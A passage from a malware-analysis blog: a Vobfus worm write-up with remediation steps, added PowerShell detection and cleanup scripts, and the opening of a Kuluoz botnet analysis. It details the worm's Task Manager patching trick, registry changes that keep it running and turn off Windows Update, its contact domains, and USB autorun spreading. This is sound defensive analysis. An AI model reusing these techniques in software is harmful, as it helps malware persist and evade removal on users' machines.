<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z-oE1-1q89kfBlHsWf0BW5g6FemMS7NtIbWki5Nb99YEjbEKwR_fKoEz3YGefIHoTGt8LQ2kDZzsc6Wy5_fTs2Tff6yIcDkSmca7-cteIQlZCADrh6C1YDyn1m6zEc2jjiOY59Hp/s1600/rtcStrConvVar2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0Z-oE1-1q89kfBlHsWf0BW5g6FemMS7NtIbWki5Nb99YEjbEKwR_fKoEz3YGefIHoTGt8LQ2kDZzsc6Wy5_fTs2Tff6yIcDkSmca7-cteIQlZCADrh6C1YDyn1m6zEc2jjiOY59Hp/s1600/rtcStrConvVar2.png" height="135" width="320" /></span></a></div>
<div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit;">The malware uses MSVBVM60.DllFunctionCall in
order to execute Windows API functions (APIs like CreateToolhelp32Snapshot,
GetDiskFreeSpaceExW, GetUserNameW, etc.).<o:p></o:p></span></span></div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div>
<span lang="EN-US" style="line-height: 115%;"><br /></span></div>
The figure below shows how a call to kernel32.Sleep
goes through MSVBVM60.DllFunctionCall.</span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOZ8_J5neyzJXVRj1XYxfPNW6suf3tcGwnWwR5ThDgeu9JVFGb7-38eWs1y4SsnAr8kQ79jz-q0R-pyuueICkqA0XyV1q6sjK7X_Dpcg__6ztxWHtZiqie6YsL8BLE78ZeNq5BgK5/s1600/DllFunctionCall.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEOZ8_J5neyzJXVRj1XYxfPNW6suf3tcGwnWwR5ThDgeu9JVFGb7-38eWs1y4SsnAr8kQ79jz-q0R-pyuueICkqA0XyV1q6sjK7X_Dpcg__6ztxWHtZiqie6YsL8BLE78ZeNq5BgK5/s1600/DllFunctionCall.png" height="90" width="320" /></span></a></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US">First and foremost, it will gather
information about the system like username, logical drives, drive types, and
disk free space. It will create a mutex named “A” upon execution.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">Vobfus will create a copy of itself as
%USERPROFILE%\<RandomFileName>.exe with file attributes set to READONLY,
HIDDEN, and SYSTEM and proceeds to execute it.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<span lang="EN-US" style="line-height: 115%;">Using the CreateToolhelp32Snapshot, Process32First
and Process32Next APIs, it walks the running processes and watches for
names containing strings such as “task” (Task Manager) or “proc” (Process
Explorer). When one is found, it prevents the user from manually closing the
malware by patching the TerminateProcess and TerminateThread APIs loaded into
Task Manager or Process Explorer so that calling them does nothing. It does this
with the WriteProcessMemory API, replacing the first byte of TerminateProcess and
TerminateThread with 0xC3 (RETN).</span></span></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWvSaGGRJXZf00qlNoS7wWe3W-yxsIMPP8VzS4mgflci_qxuExCNEMOR1dGBZDVWqHSGW3WDKlSHT-TqzdSJlDJ6YZq3BnMoc_Xs_xgVpsHqbIJzcSMnNLS9Py0VAqyw0e1OARTseJ/s1600/WriteProcessMemory.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><span style="font-family: inherit;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWvSaGGRJXZf00qlNoS7wWe3W-yxsIMPP8VzS4mgflci_qxuExCNEMOR1dGBZDVWqHSGW3WDKlSHT-TqzdSJlDJ6YZq3BnMoc_Xs_xgVpsHqbIJzcSMnNLS9Py0VAqyw0e1OARTseJ/s1600/WriteProcessMemory.png" height="39" width="320" /></span></a></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
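The patch described above is easy to verify from a clean shell. The following PowerShell check is an added example, not code from the post or from the malware: it reads the first bytes of kernel32!TerminateProcess and kernel32!TerminateThread inside a target process and flags an entry byte of 0xC3. It relies on kernel32.dll being mapped at the same base in every process of the same bitness within one boot session, so the address that GetProcAddress returns in our own process is valid in the target; run it from a PowerShell of the same bitness as the process you inspect (64-bit for taskmgr/procexp64 on x64 Windows). The process names in the usage line are assumptions, not taken from the post.

```powershell
# Added example (not from the original post): detect the in-memory RET patch on
# kernel32!TerminateProcess / TerminateThread in another process.
# Assumption: same bitness as the target, and rights to read its memory.
$sig = @'
using System;
using System.Runtime.InteropServices;
public static class Native {
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern IntPtr OpenProcess(uint access, bool inherit, int pid);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr addr, byte[] buf, int size, out IntPtr read);
    [DllImport("kernel32.dll", SetLastError = true)]
    public static extern bool CloseHandle(IntPtr h);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr GetModuleHandle(string name);
    [DllImport("kernel32.dll", CharSet = CharSet.Ansi, SetLastError = true)]
    public static extern IntPtr GetProcAddress(IntPtr module, string name);
}
'@
Add-Type -TypeDefinition $sig

function Test-EntryPatched {
    param([int]$ProcessId, [string[]]$Functions = @('TerminateProcess', 'TerminateThread'))

    $PROCESS_QUERY_INFORMATION = 0x0400
    $PROCESS_VM_READ           = 0x0010     # read-only access is all the check needs
    $h = [Native]::OpenProcess($PROCESS_QUERY_INFORMATION -bor $PROCESS_VM_READ, $false, $ProcessId)
    if ($h -eq [IntPtr]::Zero) {
        throw "OpenProcess($ProcessId) failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
    }
    try {
        $k32 = [Native]::GetModuleHandle('kernel32.dll')
        foreach ($fn in $Functions) {
            $addr = [Native]::GetProcAddress($k32, $fn)
            if ($addr -eq [IntPtr]::Zero) { throw "GetProcAddress($fn) failed" }

            # Reference bytes: the same function inside our own (unpatched) process.
            $expected = New-Object byte[] 8
            [Runtime.InteropServices.Marshal]::Copy($addr, $expected, 0, $expected.Length)

            # Actual bytes at the same address inside the target process.
            $actual = New-Object byte[] 8
            $read   = [IntPtr]::Zero
            if (-not [Native]::ReadProcessMemory($h, $addr, $actual, $actual.Length, [ref]$read)) {
                throw "ReadProcessMemory($fn) failed: $([Runtime.InteropServices.Marshal]::GetLastWin32Error())"
            }
            [pscustomobject]@{
                ProcessId  = $ProcessId
                Function   = "kernel32!$fn"
                Address    = ('0x{0:X}' -f $addr.ToInt64())
                EntryByte  = ('0x{0:X2}' -f $actual[0])
                RetPatched = ($actual[0] -eq 0xC3)     # exactly the byte vobfus writes
                Differs    = ([BitConverter]::ToString($expected) -ne [BitConverter]::ToString($actual))
            }
        }
    } finally { [void][Native]::CloseHandle($h) }
}

# Usage (process names are an assumption): check every running Task Manager /
# Process Explorer instance. RetPatched = True means the malware's patch is present.
Get-Process -Name 'taskmgr', 'procexp', 'procexp64' -ErrorAction SilentlyContinue |
    ForEach-Object { Test-EntryPatched -ProcessId $_.Id } | Format-Table -AutoSize
```

The Differs column compares the full eight entry bytes against our own copy of kernel32, so it also catches a patch that does not use 0xC3; it only remains meaningful while the shell doing the checking is itself unpatched, which for the variant described here holds as long as its process name contains neither “task” nor “proc”.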
<div>
<span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><div class="MsoNormal">
<span lang="EN-US">It then creates its REGRUN entry to ensure
it is launched at every system startup.<br />
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe. <o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It disables Windows Update by adding the
registry entry
[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU] “NoAutoUpdate”
= dword:00000001.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It will also change the folder settings to
hide protected system files (files with the SYSTEM attribute) in order to conceal the
malware from easy inspection. It does this by modifying the registry value
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001).<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It then attempts to connect to the
following sites (sending the information gathered earlier) and may attempt to
download an updated copy of itself.<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.com<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpMiddle" style="mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.net<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -.25in;">
<!--[if !supportLists]--><span lang="EN-US">·<span style="line-height: normal;">
</span></span><!--[endif]--><span lang="EN-US">ns1.player1352.org<o:p></o:p></span></div>
<div class="MsoListParagraphCxSpLast" style="mso-list: l1 level1 lfo2; text-indent: -.25in;">
<span lang="EN-US"><br /></span></div>
<div class="MsoNormal">
<span lang="EN-US">It will also try to copy itself into
removable drives like floppy, USB, etc. with filenames such as Passwords.exe,
Porn.exe, Secret.exe and Sexy.exe. An autorun.inf file will also be created in
the removable drive that will point to the malware copy in order to
automatically execute it when the drive is mounted. A file x.mpeg may also be
created but with 0 bytes in size.<o:p></o:p></span></div>
<div class="MsoNormal">
<span lang="EN-US"><br /></span></div>
<span lang="EN-US" style="line-height: 115%;">It also modifies the ICON resource section
of the files Passwords.exe, Porn.exe, Secret.exe and Sexy.exe in an attempt to
avoid the CRC/signature-based detection of some antivirus software.</span></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
<h3>
<span style="line-height: 21.527999877929688px;"><span style="font-family: inherit; font-size: large;">MANUAL REMEDIATION</span></span></h3>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;">In
order to restore the system, the first task is to find a way to kill the
running vobfus process. Remember that vobfus monitors running processes for
names containing “task” or “proc” and, when it finds one, hooks TerminateProcess
and TerminateThread, which stops Task Manager or Process Explorer from
terminating processes. To get around this, we can trick the malware by renaming
Process Explorer’s executable to any name that does not contain the “task” or
“proc” keywords.</span></span></span></div>
<div>
<span lang="EN-US" style="line-height: 115%;"><span lang="EN-US" style="line-height: 115%;"><span style="font-family: inherit;"><br /></span></span></span></div>
<div>
<span lang="EN-US"><span lang="EN-US"><div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">To put it in steps:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">1.<span class="Apple-tab-span" style="white-space: pre;"> </span>Rename procexp.exe to 1.exe.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">2.<span class="Apple-tab-span" style="white-space: pre;"> </span>Run 1.exe (copy of procexp.exe).</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">3.<span class="Apple-tab-span" style="white-space: pre;"> </span>Terminate vobfus malware in memory.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">4.<span class="Apple-tab-span" style="white-space: pre;"> </span>Delete the following registry entries using regedit:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>a.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] “<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>b.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU] “NoAutoUpdate” = dword:00000001</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">5.<span class="Apple-tab-span" style="white-space: pre;"> </span>Modify the following registry entry using regedit:</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><span class="Apple-tab-span" style="white-space: pre;"> </span>a.<span class="Apple-tab-span" style="white-space: pre;"> </span>[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced] “ShowSuperHidden” = dword:00000000 (change it back to dword:00000001 to see hidden system files in Explorer.)</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">6.<span class="Apple-tab-span" style="white-space: pre;"> </span>Manually delete copies of malware found in %USERPROFILE%\<RandomFileName>.exe and removable drives including the created autorun.inf, x.mpeg, Passwords.exe, Porn.exe, Secret.exe and Sexy.exe.</span></span></div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;">7.<span class="Apple-tab-span" style="white-space: pre;"> </span>As a recommendation, run a full system scan using Vipre to completely remove possible remnants of the malware.</span></span></div>
</div>
<div>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit;"><br /></span></span></div>
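Steps 4 to 6 above are registry and file cleanup that lends itself to a script. The PowerShell below is an added example, not the author’s script, and it also covers the artefacts named in the preceding vobfus post on this page (ert.dll and the Documents.lnk-style shortcuts on removable and shared drives). It runs in report mode by default and deletes only when started with -Remove; run it after the vobfus process has been terminated (steps 1 to 3), from an elevated shell so the HKLM policy value can be removed. Because the dropped copy’s random file name is unknown, the script treats any Run value whose command is an .exe directly under %USERPROFILE% as the vobfus entry; that matching rule is an assumption, so review the report before using -Remove. File names and registry paths are the ones given in the posts.

```powershell
# Added example (not the post author's script): scripted form of remediation
# steps 4 to 6, extended with the artefacts from the preceding vobfus post.
# Reports findings; deletes/repairs only when run with -Remove.
[CmdletBinding()]
param([switch]$Remove)

$RunKey      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
$AuKey       = 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU'
$AdvKey      = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
$UserProfile = $env:USERPROFILE
# File names taken from the two posts; nothing else is assumed.
$DropNames   = 'Passwords.exe', 'Porn.exe', 'Secret.exe', 'Sexy.exe', 'x.mpeg', 'autorun.inf', 'ert.dll'

function Act([string]$What, [scriptblock]$Fix) {
    # Report the finding; apply the fix only when -Remove was given.
    if ($Remove) { & $Fix; Write-Host "[fixed] $What" } else { Write-Host "[found] $What" }
}

# Step 4a: the Run value. The random file name is unknown, so match any value whose
# command is an .exe sitting directly under %USERPROFILE% (assumption: nothing
# legitimate autostarts from there on this machine; review the report first).
$run = Get-ItemProperty -Path $RunKey -ErrorAction SilentlyContinue
foreach ($p in @($run.PSObject.Properties)) {
    if ($p.Name -like 'PS*') { continue }                      # provider metadata, not values
    $cmd = ([string]$p.Value).Trim('"')
    if ($cmd -like "$UserProfile\*.exe" -and (Split-Path $cmd -Parent) -eq $UserProfile) {
        $name = $p.Name
        Act "Run value '$name' -> $cmd" { Remove-ItemProperty -Path $RunKey -Name $name }
        if (Test-Path -LiteralPath $cmd) {
            Act "dropped copy $cmd" { Remove-Item -LiteralPath $cmd -Force }   # -Force: file is hidden+system
        }
    }
}

# Step 4b: the Windows Update policy value (HKLM, so this part needs elevation).
$au = Get-ItemProperty -Path $AuKey -Name NoAutoUpdate -ErrorAction SilentlyContinue
if ($au -and $au.NoAutoUpdate -eq 1) {
    Act "NoAutoUpdate = 1 under $AuKey" { Remove-ItemProperty -Path $AuKey -Name NoAutoUpdate }
}

# Step 5: set ShowSuperHidden back to 1 so protected system files are visible again.
$adv = Get-ItemProperty -Path $AdvKey -Name ShowSuperHidden -ErrorAction SilentlyContinue
if (-not $adv -or $adv.ShowSuperHidden -ne 1) {
    Act "ShowSuperHidden is not 1 under $AdvKey" { Set-ItemProperty -Path $AdvKey -Name ShowSuperHidden -Value 1 -Type DWord }
}

# Step 6: removable drives (DriveType 2) and mapped network drives (DriveType 4).
$wsh = New-Object -ComObject WScript.Shell
Get-CimInstance Win32_LogicalDisk | Where-Object { $_.DriveType -in 2, 4 } | ForEach-Object {
    $root = $_.DeviceID + '\'
    foreach ($n in $DropNames) {
        $f = Join-Path $root $n
        if (Test-Path -LiteralPath $f) { Act $f { Remove-Item -LiteralPath $f -Force } }
    }
    # Shortcuts in the drive root whose target is an .exe on the same drive
    # (the Documents.lnk / Pictures.lnk trick from the earlier post).
    Get-ChildItem -LiteralPath $root -Filter *.lnk -Force -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk    = $_.FullName
        $target = $wsh.CreateShortcut($lnk).TargetPath
        if ($target -like "$root*.exe") { Act "$lnk -> $target" { Remove-Item -LiteralPath $lnk -Force } }
    }
}
```

Mapped network drives are per user, so an elevated session may not list the ones mapped in the normal desktop session; run the step 6 part once more from a non-elevated shell if the report shows no DriveType 4 entries. A full scan with the antivirus product of choice, as the post recommends in step 7, still belongs at the end.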
<h3>
<span style="line-height: 16.866666793823242px;"><span style="font-family: inherit; font-size: large;"><b>SUMMARY</b></span></span></h3>
<div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Platforms</b></i>: WINXP, WIN7, WIN8 x64<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>File-type</b></i>: Win32 PE<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Malware-type</b></i>: WORM<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Vtest first seen date</b></i>:
12/31/2013 02:58<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Vipre detection name</b></i>: Trojan.Win32.Generic!BT<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>Installation</b></i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Dropped files</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
</div>
<ul>
<li><span style="font-family: inherit;">%USERPROFILE%\<RandomFileName>.exe (copy of
malware)</span></li>
<li><span style="font-family: inherit;">Adds copy of itself to removable drives (including floppy
A:\) and may have filenames such as <i>Passwords.exe,
Porn.exe, Secret.exe, Sexy.exe</i></span></li>
<li><span style="font-family: inherit;">Creates autorun.inf file in removable drives and points
to malware copy</span></li>
<li><span style="font-family: inherit;">May create x.mpeg file in removable drives with 0 bytes</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Added registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“<RandomFileName>” = %USERPROFILE%\<RandomFileName>.exe - to
execute vobfus at system startup</span></li>
<li><span style="font-family: inherit;">[HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WindowsUpdate\AU]
“NoAutoUpdate” = dword:00000001 – to prevent windows update on system</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Modified registry</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.5in;">
</div>
<ul>
<li><span style="font-family: inherit;">[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
“ShowSuperHidden” = dword:00000000 (from dword:00000001) – to hide vobfus
dropped copy from users</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<i><span style="font-family: inherit;">Memory Residency</span></i></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
<span style="font-family: inherit;"><i>Invoked processes</i>:
%USERPROFILE%\<RandomFileName>.exe (malware dropped copy)<o:p></o:p></span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<i><b><span style="font-family: inherit;">Backdoor/Bot/Stealer</span></b></i></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Communicates to/from</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin-left: 1.0in;">
</div>
<ul>
<li><span style="font-family: inherit;">Attempts to connect to ns1.player1352.com</span></li>
<li><span style="font-family: inherit;">Attempts to connect to ns1.player1352.net</span></li>
<li><span style="font-family: inherit;">Attempts to connect to
ns1.player1352.org</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Propagates</i></b><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Method of spreading</i>: copies itself
into removable and mapped network drives.</span></div>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><i><b>General Malware</b></i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 0.5in;">
<span style="font-family: inherit;"><i>Summary of payload</i><o:p></o:p></span></div>
<div class="MsoNormal" style="margin: 0in 0in 0.0001pt 1in;">
</div>
<ul>
<li><span style="font-family: inherit;">drops copies of itself to removable
and mapped network drives</span></li>
<li><span style="font-family: inherit;">modifies the TerminateProcess and
TerminateThread APIs loaded in Task Manager or Process Explorer to prevent them
from terminating the vobfus process</span></li>
<li><span style="font-family: inherit;">may attempt to connect to an outside
address in order to download an updated copy of itself</span></li>
</ul>
<br />
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>Pertinent APIs used</i></b><o:p></o:p></span></div>
<ul>
<li><span style="font-family: inherit;">advapi32</span></li>
<li><span style="font-family: inherit;">CloseHandle</span></li>
<li><span style="font-family: inherit;">connect</span></li>
<li><span style="font-family: inherit;">CreateToolhelp32Snapshot</span></li>
<li><span style="font-family: inherit;">GetDiskFreeSpaceExW</span></li>
<li><span style="font-family: inherit;">GetDriveTypeW</span></li>
<li><span style="font-family: inherit;">GetFileAttributesW</span></li>
<li><span style="font-family: inherit;">GetLocaleInfoW</span></li>
<li><span style="font-family: inherit;">GetLogicalDrives</span></li>
<li><span style="font-family: inherit;">GetLogicalDriveStringsW</span></li>
<li><span style="font-family: inherit;">CreateMutexW</span></li>
<li><span style="font-family: inherit;">GetModuleHandleW</span></li>
<li><span style="font-family: inherit;">GetUserNameW</span></li>
<li><span style="font-family: inherit;">ExitProcess</span></li>
<li><span style="font-family: inherit;">htons</span></li>
<li><span style="font-family: inherit;">InternetCloseHandle</span></li>
<li><span style="font-family: inherit;">InternetOpenUrlW</span></li>
<li><span style="font-family: inherit;">InternetOpenW</span></li>
<li><span style="font-family: inherit;">InternetReadFile</span></li>
<li><span style="font-family: inherit;">kernel32</span></li>
<li><span style="font-family: inherit;">OpenProcess</span></li>
<li><span style="font-family: inherit;">Process32First</span></li>
<li><span style="font-family: inherit;">recv</span></li>
<li><span style="font-family: inherit;">shell32</span></li>
<li><span style="font-family: inherit;">ShellExecuteW</span></li>
<li><span style="font-family: inherit;">SHGetSpecialFolderPathW</span></li>
<li><span style="font-family: inherit;">Sleep</span></li>
<li><span style="font-family: inherit;">socket</span></li>
<li><span style="font-family: inherit;">TerminateProcess</span></li>
<li><span style="font-family: inherit;">user32</span></li>
<li><span style="font-family: inherit;">wininet</span></li>
<li><span style="font-family: inherit;">WriteProcessMemory</span></li>
<li><span style="font-family: inherit;">WSAAsyncSelect</span></li>
<li><span style="font-family: inherit;">WSAStartup</span></li>
<li><span style="font-family: inherit;">ws2_32</span></li>
<li><span style="font-family: inherit;">RegCreateKeyExW</span></li>
<li><span style="font-family: inherit;">RegSetValueExW</span></li>
<li><span style="font-family: inherit;">RegCloseKey</span></li>
</ul>
<div class="MsoNormal" style="margin-bottom: 0.0001pt;">
<span style="font-family: inherit;"><b><i>What makes it unique</i></b>:
compiled Visual Basic and its obfuscation techniques</span></div>
</div>
<div style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">
<br /></div>
</span></span></div>
Posted by Anonymous (http://www.blogger.com/profile/10653752703445056399)<br />
<br />
DISSECTING KULUOZ (2014-04-28T00:03:00.000-07:00, updated 2014-04-28T00:07:23.778-07:00)<h2>
<span style="font-size: large;">Introduction</span></h2>
<h2>
<div class="MsoNormal">
<span lang="EN-US" style="font-weight: normal;"><span style="font-family: inherit; font-size: small;">Kuluoz, also known as Asprox to some
antivirus vendors, is a Trojan <a href="http://en.wikipedia.org/wiki/Botnet" target="_blank">botnet</a>
that is usually distributed through spam emails.</span></span></div>
<div class="MsoNormal">
<span lang="EN-US"><span style="font-family: inherit; font-size: small; font-weight: normal;">This variant of kuluoz was first seen in
our malware database on the 4<sup>th</sup> of April 2014.</span><o:p></o:p></span></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXK34hOfoKHpHmGH35aNIkZ2PbHar1qU58Wh2ahDY_cQhyZb2EkitLCH0-PgEbvBSRASkz-OXkWAhlrWVOW6b1k2CaSn3aVh9Yp2x71joyAJtM-EvbH-AzpSuo-FKwz8iTMc1VHG9/s1600/1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhVXK34hOfoKHpHmGH35aNIkZ2PbHar1qU58Wh2ahDY_cQhyZb2EkitLCH0-PgEbvBSRASkz-OXkWAhlrWVOW6b1k2CaSn3aVh9Yp2x71joyAJtM-EvbH-AzpSuo-FKwz8iTMc1VHG9/s1600/1.png" /></a></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Kuluoz imitating a word
document<o:p></o:p></span></span></i></div>
<div align="center" class="MsoNoSpacing" style="text-align: center;">
<br /></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">It spoofs the icon of a Microsoft Word
document in an attempt to fool the user into executing it.</span></span></div>
<div class="MsoNoSpacing">
<br /></div>
<div class="MsoNoSpacing">
<span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">The most common and obvious <a href="http://en.wikipedia.org/wiki/Indicator_of_compromise">indicators of
compromise</a> (IOC) of kuluoz on an infected system are:<o:p></o:p></span></span></div>
<ul>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Presence of a file with a random 8-lowercase-letter
name and a Word document icon in %USERPROFILE%\Local
Settings\Application Data</span></span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKt10e6fzB6J9zdZHjV8x2PCK9sB73uGBGI0LaSc74UUkY9Ibze7VjZLdoqMso00a2WwVxa6PVaBLQq-jJTdie70l9TFul3Z_76HfzplGE4ABF9_nJOmnmwFK7gYRy7GjU05z-KbFv/s1600/2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjKt10e6fzB6J9zdZHjV8x2PCK9sB73uGBGI0LaSc74UUkY9Ibze7VjZLdoqMso00a2WwVxa6PVaBLQq-jJTdie70l9TFul3Z_76HfzplGE4ABF9_nJOmnmwFK7gYRy7GjU05z-KbFv/s1600/2.png" height="148" width="320" /></a></div>
<div align="center" class="MsoNoSpacing" style="margin-left: .5in; text-align: center;">
<i><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Kuluoz in
%USERPROFILE%\Local Settings\Application Data</span></span></i></div>
<ul>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">Presence of an autorun entry
in HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
pointing to the botnet’s executable image</span></span></li>
<li><span lang="EN-US" style="font-weight: normal;"><span style="font-size: small;">An SVCHOST.EXE process can be seen running
under Explorer.exe</span></span></li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
